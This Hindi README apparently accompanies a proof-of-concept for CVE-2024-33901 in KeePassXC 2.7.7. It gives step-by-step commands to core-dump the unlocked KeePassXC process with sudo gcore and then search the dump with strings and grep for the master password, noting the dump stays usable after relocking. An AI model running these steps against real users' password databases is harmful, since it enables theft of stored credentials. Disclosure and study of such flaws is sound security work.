
CVE-2024-33901 कमजोरी को प्रदर्शित करने वाला छोटा प्रोग्राम, KeePassXC संस्करण 2.7.7 में
एक छोटा प्रोग्राम जो KeePassXC संस्करण 2.7.7 में CVE-2024-33901 कमजोरी को प्रदर्शित करता है।
रिपोर्ट के लिए शायद स्रोत कोड को लिंक करने की आवश्यकता हो सकती है, इसीलिए मैंने इसके लिए रेपो बनाया।
KeePassXC खोलें और डेटाबेस को प्रमाणित करें।
जब डेटाबेस प्रमाणित हो, तो इसका एक मेमोरी डंप फ़ाइल बनाएँ।
यह PID प्राप्त करके किया जा सकता है, जो इस कमांड से किया जा सकता है:
ps aux | grep keepassxc
और फिर यह कमांड चलाएँ: sudo gcore -o keepassxc_dump PID_HERE
उदाहरण के लिए, यदि आपको मिला PID 1234 था, तो कमांड इस प्रकार होगी:
sudo gcore -o keepassxc_dump 1234
अंत में, आप यह कमांड चला सकते हैं: cat keepassxc_dump.PID_HERE | strings | grep "password guess here"
इसलिए यदि PID 1234 था, तो कमांड होगी:
cat keepassxc_dump.1234 | strings | grep "password guess here"
एक बार मेमोरी डंप फ़ाइल बन जाने के बाद, हमला तब भी किया जा सकता है जब डेटाबेस फिर से लॉक हो जाए या KeePassXC बंद कर दिया जाए।
प्रदान किया गया Python कोड इन सभी चरणों को निष्पादित करता है, और प्रदान की गई टेक्स्ट फ़ाइलों के आधार पर कई पासवर्ड अनुमान लगाने का प्रयास करता है।